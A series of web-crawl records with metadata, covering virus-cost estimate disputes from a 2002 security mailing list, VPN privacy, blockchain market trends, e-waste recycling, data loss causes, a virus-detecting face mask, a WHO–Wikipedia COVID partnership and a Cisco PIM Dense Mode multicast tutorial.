Computer Economics' methodology involves first conferring with anti-virus companies, governments, law enforcement and major firms, Erbschloe told us. It then tries to work out how many people received a virus and from that calculates how many were infected. From this, Computer Economics estimates the cost of patching systems and losses in worker productivity from dealing with a viral outbreak, based on benchmarking the cost of cleaning a computer of a virus.

One of the problems of this approach, explains Alex Shipp, chief antivirus technologist at managed services firm MessageLabs, is that "users are unable to estimate the damage a virus outbreak might cause their own company ... so how does a third party get a figure?"

Graham Cluley, senior technology consultant at Sophos Anti-Virus, described Computer Economics' figures as a "guesstimate" supported by insufficient data. "Most companies simply don't know how much a virus cost them," he said. "As well as lost productivity, viruses can also cost money through damaged credibility, effects on customer relations and attacks on confidentiality which is hard to estimate."

MessageLabs and Sophos say that Computer Economics has never contacted them about statistics on infections. Even if a vendor tracks the percentage of infected emails it blocks (as MessageLabs does), or consumer PCs scanned which are infected (as McAfee does), it is very difficult to place a dollar figure on such data.

Erbschloe said he didn't care what Sophos or MessageLabs thought. He said AV vendors quote Computer Economics figures but disagree when an estimate is either higher or lower than suits them. "Some of them are full of shit," Erbschloe told us, before calming down to say, "our figures help end-users decide how much to spend on antivirus".

Assessing the cost of virus infections isn't like counting server sales, and whoever you sympathise with here, it would be wise to take any figures with a grain of salt and to remember the AV industry has struggled with metrics for years.

- ISN is currently hosted by Attrition.org
To unsubscribe email majordomoat_private with 'unsubscribe isn' in the BODY of the mail.
This archive was generated by hypermail 2b30 : Thu Jan 17 2002 - 16:42:12 PST
|
<urn:uuid:c692d4d5-c650-47f3-93e8-c942241acd85>
|
CC-MAIN-2022-40
|
http://lists.jammed.com/ISN/2002/01/0095.html
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00247.warc.gz
|
en
| 0.962175 | 822 | 2.53125 | 3 |
What Does My ISP See When I Am Connected To VPN?
A virtual private network (VPN) gives you online privacy and anonymity by creating a private network from a public internet connection. VPNs mask your internet protocol (IP) address so your online actions are virtually untraceable. Most important, VPN services establish secure and encrypted connections to provide greater privacy than even a secured Wi-Fi hotspot.
Your ISP sees your VPN connection because they can recognize an unfamiliar IP address. However, they cannot see anything specific about your online activity. This includes your search and download history, as well as the websites you visit.
What’s Visible To ISPs When You Use A VPN?
While a VPN does keep you anonymous online, your ISP will still be able to see some of the following:
- Your VPN connection: Your ISP will see that you connect to a VPN server but won’t know what you are doing. All information is encrypted and illegible.
- Your VPN server’s IP (Internet Protocol) address: Thanks to your ISP, you have access to the internet. They are responsible for sending your requests as data packets to a VPN server. So, they’ll always know the VPN’s IP address but not the data packet’s final destination.
- Your VPN’s protocol: To provide a safe connection, VPNs use a technology that offers different protocols (visible to your ISP). Even though your ISP sees what protocol you’re using, they cannot take any information from it, so it doesn’t affect you in any way.
- Your connection timestamps: Your ISP can always see when you connect and for how long, but they won’t know what websites you’re on. Whether you use a VPN or not, they’ll see when you connect to the internet.
- Your bandwidth usage: When you browse, stream, download large files, or play games, your ISP may see how much bandwidth you use. But they won’t know what you’re using it for.
Apart from these, the only other important thing your service provider can detect is the fact that your actual online traffic is hidden from them. That means it loses access to the following information:
- The websites you visit
- The specific web pages you browse and the time you spend there
- Your browsing and search history
- The files you download from or upload to unencrypted websites
- The info you type on unencrypted websites
|
<urn:uuid:acaaf733-9583-4dda-a397-c52664a47c41>
|
CC-MAIN-2022-40
|
https://www.abijita.com/what-does-my-isp-see-when-i-am-connected-to-vpn/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00247.warc.gz
|
en
| 0.901557 | 547 | 2.515625 | 3 |
The concept of blockchain has been circulating in the technology field for quite some time. Though blockchain technology appears complicated, the core concept behind it is fairly easy to understand. A blockchain is, at its core, a type of database.
Like every other database, blockchain is used to store data and information electronically. But the primary difference between a conventional database and a blockchain is the way the data is structured. A normal database stores data in the form of tables with entries, whereas a blockchain collects and stores data in groups known as blocks.
Each block in the blockchain has a certain storage capacity. Once that capacity is reached, the block is chained to the previous block and a new block is created. Every block in the network carries its own hash and the hash of the previous block; a hash is a digital fingerprint produced by converting information into a fixed-length string of characters and numbers. Chaining each newly filled block to its predecessor is how the blockchain network is formed.
Moreover, blockchain is a decentralized, distributed ledger technology. This means that no single party owns or controls the data and information on the blockchain network. With the help of distributed ledger technology (DLT), the data can be shared across the blockchain network. Once data has been entered into the blockchain, it becomes immutable: no one can alter or edit it after it has been inserted. Additionally, blockchain provides transparency by making the data traceable over the blockchain network.
Market size and growth rate of the blockchain (2020-2025)
The global blockchain market is expected to reach $39.7 billion by 2025 with a compound annual growth rate of 67.3% between 2020 and 2025.
Meanwhile, by the end of 2024, company spending on blockchain-based services is expected to reach $20 billion.
Segmenting the market by organization size, the SME segment is predicted to grow at the highest rate during the forecast period (2020 to 2025). Segmenting by application, the banking and financial sector is the largest contributor to the growth of the global blockchain market during the same period.
Future scope and application of blockchain technology in various sectors
According to Statista, the value of the global blockchain market in the food and agriculture sector is forecasted to reach about $1.4 billion by 2028.
Beyond cryptocurrencies, blockchain has widened its scope of application across various sectors such as banking and finance, healthcare, smart contracts and supply chains.
Blockchain in banking and financial sectors
The financial and banking sectors are expected to be the two biggest contributors to the growth of blockchain in the near future. Implementing blockchain technology in these sectors can reduce transaction costs and improve fraud detection, trading and payments.
Almost all banks today are built on centralized databases. A centralized database is highly prone to cyberattacks, as an attacker can gain control over all the data once the perimeter security has been breached. Blockchain's use of cryptography makes it far harder for an attacker to break into the system; additionally, to tamper with a single block, the attacker would effectively have to alter the entire chain of blocks.
When it comes to trading, a lot of paperwork is involved, such as a letter of credit that has to be sent by fax or post to the involved parties, regardless of their locations. So, when multiple parties have to access the same information, blockchain becomes the obvious solution.
Banks operate only five days a week, and anyone who needs to transfer money on a weekend has to wait until the start of the next week. Sometimes the transaction process is delayed or even fails. Using blockchain for payment transactions not only ensures fast transfers but also keeps a timestamped record of every transaction.
Blockchain in Healthcare sector
The healthcare sector deals with a great deal of sensitive information on a daily basis, so it is very important to secure that data. With blockchain technology, a generated medical record can be digitally signed and written into the blockchain, after which the patient has proof that the record will remain unaltered.
These medical records can be encrypted and stored in the blockchain network with a unique key or a private key. This ensures privacy by allowing only the members who have the key to access the data.
Blockchain in Smart contracts
Smart contracts are blocks of code written into the blockchain to validate and verify an agreement. The program executes only when the given conditions are satisfied. Smart contracts remove the need to draw up piles of paperwork and the need for a third party to validate the agreement.
Blockchain in supply chain management
Today’s world is moving towards a fast-paced lifestyle. The demand for products and services is exponentially increasing. To keep up with the demand vs supply requirements, companies had to improve the speeds of their business processes. Especially in the supply chain area. Blockchain technology has greatly helped companies in achieving this.
Manual processes that depend on paper tend to consume a lot of time. This mostly happens in the shipping industry. These processes can be replaced by blockchain technology to reduce the time consumed.
Using blockchain, the traceability of products can be increased: organizations can create a decentralized record of all transactions to track products from production through delivery to the customer.
Limitations of blockchain technology
Blockchain technology has brought in various positive impacts in the field of technology. But there are still some limitations to adopting this technology.
Cost and implementation
The initial cost of implementing blockchain technology is massive. There are open-source blockchain solutions available, but to implement this technology it is essential to hire developers and other experts to develop and maintain. Paid blockchain solutions have to be licensed.
Typically, an enterprise-level blockchain solution could cost around a million dollars.
Expertise in the field
As mentioned earlier, a blockchain system needs to be properly maintained, and people with plenty of experience and knowledge in this area have to be hired. Even then, the existing employees of a company or an enterprise have to be able to understand the complexities of how the system works.
The number of transactions a blockchain network can process is limited by its consensus mechanism, which requires every node to verify each transaction. This makes blockchains a poor fit for applications with large transaction volumes. Bitcoin, one of the best-known applications of blockchain in cryptocurrency, is currently limited to about 7 transactions per second.
The data becomes immutable once it has been entered into the blockchain network. That is, it is not possible to edit or alter the data after the data has been entered. Though this is considered to be an advantage for various reasons, it still has its drawbacks.
If the data has been wrongly entered or if it needs to be altered, it becomes practically impossible to do so.
Major players in the field of blockchain technology
1) Consensys
Consensys, a blockchain company, develops enterprise-level blockchain applications and developer tools that are secure and efficient. The company also supports blockchain startups by investing alongside them.
2) Blockchain Intelligence Group
Blockchain Intelligence Group is one of the most trusted blockchain companies in the world. The company provides consulting services on building blockchain applications and aims to provide optimal solutions for reducing the risk involved in cryptocurrency transactions.
3) Blockchangers
Blockchangers is one of the most prominent blockchain companies, with a strong presence in the IT sector. The company provides consulting services on blockchain-based project ideas and helps clients understand and leverage the benefits of blockchain. The company also provides lectures, workshops and development services to its clients.
Top 10 sites to learn blockchain technology
There are many students and other people who are enthusiastic about the blockchain field, and many online courses are offered by experts and professionals. The 10 most highly rated websites include:
- IBM cognitive class platform
- B9 lab academy
- Khan Academy
- Class central
Career scope in the blockchain sector
The blockchain sector has been growing exponentially in almost all fields, and it offers a wealth of career opportunities as demand for experts keeps increasing. Some of the job roles the blockchain sector offers are:
- Blockchain developer
- Blockchain solution architect
- Blockchain project manager
- Blockchain UX designer
- Blockchain quality engineer
- Blockchain legal consultant
Experts Insights on blockchain technology
Many experts and leaders in the field of blockchain technology have shared their insights on this technology. A few of these are mentioned below.
1) Benjamin Dynkin, a cybersecurity attorney in NYC, anticipates that blockchain technology is the solution to eliminate the need for trust in transactions.
2) Kyle Therriault, executive vice president at Auto Accessories Garage, pointed out that blockchain technology will assist in bringing self-driving cars to market. Though self-driving cars have passed their test runs, cybersecurity concerns remain, and blockchain can help protect these vehicles against cyberattacks.
3) John Zanni, President of Acronis, predicted during the initial stages of blockchain development that it could potentially address all of the modern-day security concerns like identity and fraud detection. Blockchain will also help online business vendors and financial organizations to fight against cybercrime.
Several years of research and development of blockchain technology have finally paid off. Many practical solutions based on blockchain technology are being developed and deployed these days. In the coming years, blockchain technology should make business as well as government processes more efficient, accurate, secure and cost-effective, with little or no involvement of third parties.
|
<urn:uuid:16d573a5-5bf6-4084-a73d-7d410555d832>
|
CC-MAIN-2022-40
|
https://expersight.com/what-is-blockchain-technology-market-size-use-cases-future-scope/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00447.warc.gz
|
en
| 0.945257 | 2,030 | 3.265625 | 3 |
What is E-Waste?
Electronic waste, commonly referred to as e-waste, consists of electronics that are nearing the end of their useful life, ranging from laptops and computers to batteries and chargers. E-waste can also be defined as any discarded electronic device with a battery, plug or power source; such devices often contain toxic and hazardous materials, such as mercury, which pose risks to human health and the environment.
Environmental Threats of E-Waste
According to the World Economic Forum, the globe discarded 57.4 million tonnes of electronic waste into landfills in 2021—which outweighs the Great Wall of China. The cause for an increase in global e-waste is the growth of consumption and production of electronic products. Tech giants tend to release new generations of devices each year and consumers are inclined to chuck their old devices and upgrade to the new—even if their current device is in perfect condition. This is a huge contributing factor to the increase in annual global e-waste.
Electronic waste affects climate change in several ways. Every device on our planet has a carbon footprint and has contributed to global warming: the process of manufacturing laptops and other devices generates CO2 emissions. The vast number of devices pushed through manufacturing facilities each year therefore contributes to an overall negative environmental impact.
Reduce. Reuse. Repair. Recycle.
To cut carbon emissions and protect the overall health of our planet from the e-waste problem, businesses need to include the power of the 4 R's in their corporate social responsibility plans. Being mindful of where e-waste lands can help you limit how much you consume and its environmental impact.
It’s simple! Instead of buying the latest and greatest device, take care of the device you have, to ensure its lifespan lasts longer.
Instead of throwing away your old device, visit a refurbisher! You can receive maximum value for your retired assets and avoid sending your gadget to the landfill.
This is the most responsible and environmentally friendly way to dispose of your assets! It's also easier than you think. Certified recyclers like Lifespan provide simplified recycling solutions for businesses. Our EZ-cycle® Box is designed to let you dispose of your obsolete IT equipment without facing any penalties or legal issues.
Reduce E-Waste Threats with Lifespan
At Lifespan, minimizing carbon footprint is an essential component of all our ITAD processes. We understand the growing issue of electronic waste and its impacts on our health and the environment. Lifespan provides comprehensive IT recycling solutions to help build a better planet and brighter future. Schedule a call with one of our experts today to equip your ITAD program with responsible IT recycling.
|
<urn:uuid:2aa95ea5-091b-4498-a6c6-1e89d744e611>
|
CC-MAIN-2022-40
|
https://www.lifespantechnology.com/the-threat-of-e-waste/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00447.warc.gz
|
en
| 0.92444 | 583 | 3.125 | 3 |
Every organization has sensitive information that it must protect at all costs. If that information is lost or compromised, a business can suffer the loss of profits, consumers, reputation, and much more. That is why it is crucial to understand data loss and everything that comes with it.
So, if you want to understand this term, you have come to the right place. Here is everything you need to know about it.
Data Loss Definition
Data loss occurs when an organization's sensitive information is lost or compromised because of power outages, malware, viruses, human error, or theft. The damage can also be physical, such as equipment or mechanical failure.
Organizations must set the right policies to ensure that they don’t lose all their data and sensitive information. Besides that, they must also have strategies and plans for when data loss occurs. Such plans will ensure that the organization is protected at all times.
The Top Causes Of Data Loss
Here are the top causes of data loss in an organization:
- Laptop Or Computer Theft
The age of PCs is over, and most people now use their laptops or smartphones to work and conduct business. That is why laptop theft is one of the most significant risks and causes of data loss. It can happen anywhere if someone leaves the laptop open and unattended for others to grab.
Besides that, laptop theft can also cause a data breach if your staff stores or accesses sensitive information on their devices. So, you must take steps to minimize this risk.
- Human Error
Humans are prone to mistakes; it is part of our nature. Human error in data handling can lead to the deletion or overwriting of data, and much more. Human error can also lead to physical damage that causes data loss, such as liquid spills, damage to the hard drive, and more.
That is why all businesses must train their employees to handle data correctly. Staff must understand all aspects of data handling so they can do it appropriately.
- Malware And Viruses
All computers and laptops are prone to viruses and malware. Viruses can lead to data stealing, data deletion, and much more. Most computers get viruses from email or phishing attacks.
That is why you must invest in anti-virus software to guard your computers against such data loss threats. Also, be sure to back up data to another location.
That is everything you need to know about data loss and what causes it to happen in an organization. Once you understand these causes, you can take the appropriate steps to ensure that it does not happen to your business. When you take these steps, you will have peace of mind knowing that your data is always protected.
|
<urn:uuid:8d17a836-d033-44e8-81fe-8a5d8db6c882>
|
CC-MAIN-2022-40
|
https://fluentpro.com/glossary/data-loss/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00447.warc.gz
|
en
| 0.954344 | 581 | 3.203125 | 3 |
Face masks — the unofficial symbol of the COVID-19 pandemic — are leveling up.
A mask outfitted with special electronics can detect SARS-CoV-2, the virus that causes COVID-19, and other airborne viruses within 10 minutes of exposure, materials researcher Yin Fang and colleagues report September 19 in Matter.
"The lightness and wearability of this face mask allows users to wear it anytime, anywhere," says Fang, of Tongji University in Shanghai. "It is expected to serve as an early warning system to prevent large outbreaks of respiratory infectious diseases."
Airborne viruses can hitch a ride between hosts in the air droplets that people breathe in and out. People infected with a respiratory illness can expel thousands of virus-containing droplets by talking, coughing and sneezing. Even those with no signs of being sick can sometimes pass on these viruses; people who are infected with SARS-CoV-2 can start infecting others at least two to three days before showing symptoms (SN: 3/13/20). So viruses often have a head start when it comes to infecting new people.
Fang and his colleagues designed a special sensor that reacts to the presence of certain viral proteins in the air and attached it to a face mask. The team then spritzed droplets containing proteins produced by the viruses that cause COVID-19, bird flu or swine flu into a chamber with the mask.
The sensor could detect just a fraction of a microliter of these proteins — a cough might contain 10 to 80 times as much. Once a pathogen was detected, the sensor-mask combo sent a signal informing the researchers of the virus's presence. Ultimately, the researchers plan for such signals to be sent to a wearer's phone or other devices. By combining this technology with more conventional testing, the team says, health care providers and public health officials might be able to better contain future pandemics.
|
<urn:uuid:aff6f456-93e9-41e7-9588-1d4395b0db08>
|
CC-MAIN-2022-40
|
https://dimkts.com/this-face-mask-can-sense-the-presence-of-an-airborne-virus/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00447.warc.gz
|
en
| 0.943818 | 431 | 2.96875 | 3 |
Published Tuesday, Oct 27 2020, by Adnan Kayyali
The World Health Organization and the Wikimedia Foundation, the nonprofit that administers Wikipedia, have announced their commitment to making critical COVID-19 information accessible to everyone.
The latest collaboration between the two organizations will ensure equitable, free, and available information amidst the ongoing pandemic. The information will be available under the Creative Commons Attribution-ShareAlike license. This allows any outside organization to freely share the COVID-19 information on their own platforms, further spreading essential knowledge.
“Access to information is essential to healthy communities and should be treated as such,” said CEO at the Wikimedia Foundation, Katherine Maher. “This becomes even more clear in times of global health crises when information can have life-changing consequences. All institutions, from governments to international health agencies, scientific bodies to Wikipedia, must do our part to ensure everyone has equitable and trusted access to knowledge about public health, regardless of where you live or the language you speak.”
In addition, people can access the Wikimedia Commons digital multimedia library, containing videos, infographics, and other public health-related content. Wikipedia's 250,000 independent editors and volunteers can now help expand COVID-19 coverage. There are currently over five thousand virus-related articles, and many Wiki volunteers are able to translate the content into numerous languages.
Wikipedia and WHO teams have been busy tackling and fending off misinformation, which has caused significant damage over the past few months. Users can now access the WHO myth busters’ infographic series.
As one of the most viewed sources on the internet and around the globe, Wikipedia has the power to hold its COVID-19 information up high for ‘those in the back’, so to speak. Coupled with the reach, resources, and expertise of the WHO, this collaboration could make a significant difference in protecting the vulnerable in the coming years.
|
<urn:uuid:6ff40989-0073-40b8-9db2-7c97a56c7a03>
|
CC-MAIN-2022-40
|
https://insidetelecom.com/the-latest-covid-19-information-hub/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00447.warc.gz
|
en
| 0.918312 | 519 | 2.90625 | 3 |
This article continues the series on IP Multicast. We’ll take a look at how basic IP multicast works. We’ll then look at how PIM Dense Mode (PIM-DM) operates, how to configure it, and how to troubleshoot it. This should warm us up before taking on the slightly more complex and more scalable PIM Sparse Mode in a later article.
The initial multicast article contains links to the key IETF working groups at its end. It can be found at The Protocols of IP Multicast.
Understanding IP Multicast Forwarding
The purpose of a multicast routing protocol is to allow routers to work together to efficiently deliver copies of multicast packets to interested receivers. In the process of doing this, the multicast routing protocol probably also provides a mechanism for neighbors to discover and track neighboring routers also using the multicast routing protocol.
As we saw in the last article, those computers interested in receiving a multicast packet stream use IGMP to notify adjacent router(s). The routers then use the multicast protocol to arrange for a copy of the multicast packet stream to be sent to them so they can forward it onto the LAN containing the receiver. We made no mention of what happens at the source end of the packet stream. In IP multicast, there is no protocol for the source to communicate or register or notify the routers. The source just starts sending IP multicast packets, and it is up to the neighboring router(s) to do the right thing. (What the “right thing” happens to be depends on the multicast routing protocol).
The following picture shows a source sending a multicast packet in red, and downstream routers duplicating the packet and flooding it to other routers and ultimately all LAN segments. As we’ll see shortly, this is the initial (and periodic) behavior of Cisco’s Protocol Independent Multicast (PIM) multicast routing protocol, when acting in Dense Mode.
Notice in the above picture that the blue arrows forward multicast packet copies in an organized way. There may be two copies of each packet coming into some of the routers or LAN segments. But the routers do not forward packets “backwards”. This is a good thing: think about what might happen if router E were to forward a copy of the packet it received from C to router B. Would B then forward the packet to A, which might forward it to C, and so on, in a forwarding loop? This would be a sort of Layer 3 equivalent of what happens at Layer 2 when Spanning Tree is disabled in a loop topology: a good way to waste a lot of bandwidth and router capacity.
To prevent multicast forwarding loops, IP multicast always performs an RPF check, which we’ll talk about shortly.
In addition to the RPF check, multicast routing protocols such as PIM may also work to prevent inefficiency. For example, router E in the picture does not need to receive two copies of each multicast packet (one from B, one from C).
The multicast routing protocol determines which interfaces to send copies out (or not send copies out). As the above picture suggests, multicast forwarding occurs along logical trees, branching paths through the network. All the multicast forwarding information is stored in the multicast state table, which some people call the multicast routing table. This information can be viewed with the very useful command, show ip mroute. Let’s take a brief look at sample output from the show ip mroute command (with PIM Dense Mode running).
Router# show ip mroute 224.1.1.1
IP Multicast Routing Table
Flags: D - Dense, S - Sparse, C - Connected, L - Local, P - Pruned
       R - RP-bit set, F - Register flag, T - SPT-bit set
Timers: Uptime/Expires
Interface state: Interface, Next-Hop, State/Mode

(*, 224.1.1.1), uptime 0:57:31, expires 0:02:59, RP is 0.0.0.0, flags: DC
  Incoming interface: Null, RPF neighbor 0.0.0.0
  Outgoing interface list:
    Ethernet0, Forward/Dense, 0:57:31/0:02:52
    FastEthernet1, Forward/Dense, 0:56:55/0:01:28
    FastEthernet2, Forward/Dense, 0:56:45/0:01:22

(172.16.16.1/32, 224.1.1.1), uptime 20:20:00, expires 0:02:55, flags: C
  Incoming interface: FastEthernet1, RPF neighbor 10.20.30.1
  Outgoing interface list:
    Ethernet0, Forward/Dense, 20:20:00/0:02:52
To understand this, note that addresses whose first octet is in the range 224 through 239 are IP multicast addresses, or groups. (The group refers to the group of receivers for that multicast destination address).
The entry starting with (*, 224.1.1.1) is a shared multicast tree entry, sometimes referred to as a (*, G) entry. (G here is just the group 224.1.1.1). PIM-DM doesn't use these for packet forwarding, but does list interfaces with a role in multicast (known IGMP receiver or PIM neighbor) as outgoing interfaces under such entries.
The entry starting with (172.16.16.1, 224.1.1.1) is referred to as an (S, G) entry. S is source, G is group. If you prefer, think of this as source and destination in the IP header (since that's where they actually appear in the packets). This entry is a source-specific multicast tree for a particular multicast group. There will generally be one such entry for each source and group. Note that the unicast routing next hop shows up as the RPF neighbor, and the incoming interface is the RPF interface, the interface used by unicast routing towards the source 172.16.16.1. The outgoing interface list shows that any packet from 172.16.16.1 with destination 224.1.1.1 received on FastEthernet1 will be copied out Ethernet0.
You can draw the multicast forwarding tree for a particular (S, G) for troubleshooting purposes. To do this, run the show ip mroute command on each router. Take a copy of your network map and draw an outbound arrow for each interface in the outgoing interface list (“OIL” or “OILIST”). You’ll end up with a diagram somewhat like the above picture.
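If you would rather have the routers walk the tree for you, the mtrace exec command traces the reverse (RPF) path from a receiver back toward the source, hop by hop. Here is a sketch of what that might look like, reusing the hypothetical source 172.16.16.1 and example group 224.1.1.1 from above, plus a made-up receiver 10.40.50.5; the exact output format varies by IOS version:

Router# mtrace 172.16.16.1 10.40.50.5 224.1.1.1
Type escape sequence to abort.
Mtrace from 172.16.16.1 to 10.40.50.5 via group 224.1.1.1
From source (?) to destination (?)
Querying full reverse path...
 0  10.40.50.5
-1  10.40.50.1 PIM  [172.16.16.0/24]
-2  10.20.30.1 PIM  [172.16.16.0/24]
-3  172.16.16.1

Each hop is reported from the receiver back toward the source, along with the protocol in use and the route that satisfied the RPF check, which makes mtrace a quick sanity check before you start drawing arrows by hand.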
State flags you might see in PIM-DM show ip mroute output:
- D = Dense Mode. Appears on (*, G) entries only. Group is operating in Dense mode.
- C = Directly Connected Host (IGMP!)
- L = Local (Router is configured to be a member of the multicast group).
- P = Pruned (All OILIST interfaces set to Prune). The router generally send Prune to its RPF neighbor when this occurs.
- T = Forwarding via Shortest Path Tree (SPT), indicates at least one packet received / forwarded.
- J = Join SPT. Always on in (*,G) entry in PIM-DM, doesn’t mean much.
What is the RPF Check, and Why?
IP multicast forwarding always performs an RPF check. RPF stands for Reverse Path Forwarding. The goal of the RPF check is to try to prevent a multicast packet forwarding loop in a simple way. For each multicast stream, the multicast router checks the source address, what device sent the multicast. It then looks the sender up in the unicast routing table, and determines the interface it would use to send unicast packets to the multicast source. That interface is the RPF interface, the one on which the router “expects” to receive multicasts. Think of it as the “officially approved” interface for receiving multicasts from that particular source. The router stores the RPF interface as part of the multicast state information for that particular source and that particular multicast destination (group).
When a multicast packet is received by the router, the router tracks which interface the packet came in. If the packet is the first packet from a new source, the RPF interface is determined and stored in the mroute table, as just discussed. Otherwise, the router looks up the source and multicast group in the mroute table. If the packet was received on the RPF interface, the packet is copied and forwarded on each outgoing interface listed in the mroute table. If the packet was received on a non-RPF interface, it is discarded. If the router were a person, this would be the equivalent of “What’s that person sending me this for? They must be confused, I’ll ignore what they just sent me.”
The router also does not send a copy of a packet back out the interface it came in (the RPF interface). In other words, even if the neighboring router on the RPF interface somehow were to request to be sent copies of a multicast stream, the router will not add the RPF interface to the list of outbound interfaces which receive copies of the multicast stream. This protects against any sort of protocol error getting two neighbors into a tight multicast forwarding loop.
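You can also ask a router directly which interface it considers the RPF interface for a given source. The show ip rpf command performs the lookup for you; the following is a sketch of typical output, reusing the hypothetical source 172.16.16.1 and RPF neighbor 10.20.30.1 from the earlier mroute example (field details vary by IOS version):

Router# show ip rpf 172.16.16.1
RPF information for ? (172.16.16.1)
  RPF interface: FastEthernet1
  RPF neighbor: ? (10.20.30.1)
  RPF route/mask: 172.16.0.0/16
  RPF type: unicast (ospf 1)
  RPF recursion count: 0
  Doing distance-preferred lookups across tables

If the RPF interface shown here is not the one the multicast is actually arriving on, the packets are being dropped by the RPF check, and that is the first thing to fix.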
Router E is also probably ignoring one of the two packet streams, based on whether B or C is connected to the RPF interface. Even with equal cost routes, normally just one interface is chosen as the RPF interface. So if you have two links connecting two routers, only one will typically be used for multicast from any one source subnet.
See, however, the command ip multicast multipath (new in Cisco IOS Versions 12.0(8)T and 12.0(5)S). With this command, used properly, there can be load balancing across different sources for a particular multicast group. Since this is per-source and not per-stream, it really becomes more like load splitting. It may not end up being very balanced.
Load balancing traffic for one packet stream (one source and group) over two links between two routers can also be done using GRE tunnels between loopback interfaces, although I might worry about performance implications of doing this with a high bandwidth flow.
By the way, this also tells us how to direct IP multicast over links of our choosing. We control where multicast traffic goes by controlling the RPF check. If a router doesn’t learn routes back to a multicast source on some interface, then that interface will not be the RPF interface. So with distance vector protocols and “route starvation” (not advertising a route to a neighbor), we can steer or direct multicast.
We’ll see later that any PIM grafts or joins are sent out the RPF interface, back towards the source (or RP, in PIM Sparse Mode). By controlling where this activity takes place, we control which links the multicast is forwarded on. Static mroute entries (static routes back to the source for multicast RPF check purposes) are another way of directing multicast traffic. If / when we talk about Multicast MBGP (Multiprotocol BGP for Multicast), we’ll see that MBGP also provides us with a way to direct or control the links used by multicast traffic. Also note that if the RPF interface does not have IP multicast enabled, then in effect the router is expecting packets where it will not receive them. The RPF interface should always be one where IP multicast is enabled.
PIM Dense Mode — Overview
Protocol Independent Multicast has two modes, Dense Mode and Sparse Mode. This article only has space to cover the former. We’ll get to PIM-SM in the next article.
PIM Dense Mode (PIM-DM) uses a fairly simple approach to handle IP multicast routing. The basic assumption behind PIM-DM is that the multicast packet stream has receivers at most locations. An example of this might be a company presentation by the CEO or President of a company. By way of contrast, PIM Sparse Mode (PIM-SM) assumes relatively fewer receivers. An example would be the initial orientation video for new employees.
This difference shows up in the initial behavior and mechanisms of the two protocols. PIM-SM only sends multicasts when requested to do so, whereas PIM-DM starts by flooding the multicast traffic and then stops it on each link where it is not needed, using a Prune message. I think of the Prune message as one router telling another "we don't need that multicast over here right now".
In older Cisco IOS releases, PIM-DM would re-flood all the multicast traffic every 3 minutes. This is fine for low volume multicast, but not higher bandwidth multicast packet streams. More recent Cisco IOS versions support a new feature called PIM Dense Mode State Refresh, since 12.1(5)T. This feature uses a PIM state refresh messages to refresh the Prune state on outgoing interfaces. Another benefit is that topology changes are recognized more quickly. By default, the PIM state refresh messages are sent every 60 seconds.
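On the router(s) directly attached to the source, the origination interval for these messages can be tuned per interface. A minimal sketch, using a hypothetical interface name and the 60-second default mentioned above:

interface FastEthernet1
 ip pim state-refresh origination-interval 60

Downstream routers process and forward the messages by default; if you need to turn that off globally, the ip pim state-refresh disable command does so, at the cost of falling back to periodic re-flooding.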
Consider routers E and F in the above picture. When two PIM-DM routers connect to a LAN, they will see the multicast packets from each other. One should forward packets to the LAN, and the other not. They both send Assert messages. Best routing metric wins, with higher IP address as a tie-breaker. If they are using different routing protocols, a weighted routing metric scheme, somewhat like administrative distance, settles which router is to be the Forwarder (forwarding the multicast packets onto the LAN). The Forwarder may be silenced by a Prune from a downstream router with no receivers, if there are also no receivers on the LAN segment. Downstream routers may have to adjust their RPF neighbor, to reflect the winner of the Assert process.
To repeat that in full detail: when multicast traffic is received on a non-RPF interface, a Prune message is sent, provided the interface is point-to-point. These Prune messages are rate-limited, to make sure the volume of them (potentially, one per multicast received) doesn’t cause further problems.
If the non-RPF interface is a LAN, an Assert message is sent. Non-Forwarder routers then send a Prune on their RPF interface if they don’t need the multicast stream. Only one such Prune is sent, at the time of the transition to having no interfaces in the Outgoing Interface List (OILIST). The LAN Prune receiver delays acting on it for 3 seconds, so that if another LAN router still needs the multicast stream, it can send a PIM Join message to counteract (cancel) the Prune. (“Yo, that router doesn’t need it, but I still do!”)
Suppose a router has Pruned, and some time later a receiver requests the multicast stream with an IGMP message. The router then sends a Graft message. In effect, “hey, I need that multicast stream over here now”.
The following picture illustrates this, admittedly in somewhat compressed form.
Explanation of the picture:
In step (1), router E chooses B as its RPF neighbor, based on unicast routing back to the source. E then receives a multicast packet on the point-to-point interface from C, and sends a rate-limited Prune to C.

In step (2), routers E and F on the LAN exchange Assert packets when either sees the multicast forwarded by the other. Suppose E wins, based on unicast routing metric or IP address. F then knows not to forward multicasts onto the LAN. Note that G and H are not involved, since the Ethernet is their RPF interface.

In step (3), suppose router G has no receivers downstream. It can then send a LAN Prune to the Forwarder for the LAN, router E.

In step (4), if router H has local or downstream receiver(s), it counters this with a LAN Join.

In step (5), suppose router D had no downstream or local receivers and sent a Prune to B. If sometime later one of the PCs to its right sends it an IGMP message for the same multicast group, router D can send a PIM Graft to B, asking B to resume sending it the specified multicast group.
PIM Protocol and Packet Types
PIM is a full routing protocol, with various kinds of messages. I’m not about to drone on and on about the different messages. But I do think it’s worth taking a brief look, since it tells us a little about the protocol.
PIM uses Hello messages to discover neighbors and form adjacencies. The Hello is sent to the All-PIM-Routers local multicast address, 224.0.0.13, every 30 seconds (PIMv1 used the All-Routers address, 224.0.0.2). Each LAN has a PIM Designated Router (DR), used in PIM Sparse Mode. It is also the IGMPv1 Querier: the highest IP address on the LAN. The show ip pim neighbor command shows neighbors and adjacency and timer information.

Clarification added 12/11/2004: the IGMP querier and the PIM Designated Router are two distinct roles.

In IGMP version 1, “The DR is responsible for the following tasks:
- Sending PIM register and PIM join and prune messages toward the RP to inform it about host group membership.
- Sending IGMP host-query messages.”
